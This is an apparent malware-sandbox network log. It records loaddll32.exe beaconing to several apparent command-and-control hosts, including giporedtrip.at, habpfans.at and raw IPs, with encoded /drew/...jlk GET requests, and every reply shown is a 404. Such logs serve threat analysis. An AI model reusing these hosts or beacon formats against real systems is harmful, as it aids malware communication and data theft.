                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at58.235.189.190A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • 194.76.226.200
                        • giporedtrip.at
                        • habpfans.at
                        • 31.214.157.187

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.549758194.76.226.20080C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:03:50.217694044 CET1190OUTGET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 194.76.226.200
                        Jan 26, 2022 17:03:50.485863924 CET1191INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:03:50 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.549771211.119.84.11280C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:04:11.131587029 CET8224OUTGET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: giporedtrip.at
                        Jan 26, 2022 17:04:12.363171101 CET11882INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:04:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.54978141.41.255.23580C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:04:32.817919970 CET17822OUTGET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: habpfans.at
                        Jan 26, 2022 17:04:33.531102896 CET17823INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:04:33 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.54981231.214.157.18780C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:04:53.808751106 CET17909OUTGET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 31.214.157.187
                        Jan 26, 2022 17:04:54.068263054 CET17910INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:04:54 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.549816194.76.226.20080C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:05:34.308445930 CET17926OUTGET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 194.76.226.200
                        Jan 26, 2022 17:05:34.582305908 CET17927INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:05:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        5192.168.2.549825181.129.180.25180C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:05:55.173449993 CET18600OUTGET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: giporedtrip.at
                        Jan 26, 2022 17:05:56.107831001 CET18601INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:05:55 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        6192.168.2.54982761.36.14.23080C:\Windows\System32\loaddll32.exe
                        TimestampkBytes transferredDirectionData
                        Jan 26, 2022 17:06:16.920280933 CET18609OUTGET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: habpfans.at
                        Jan 26, 2022 17:06:18.136353016 CET18610INHTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:06:17 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
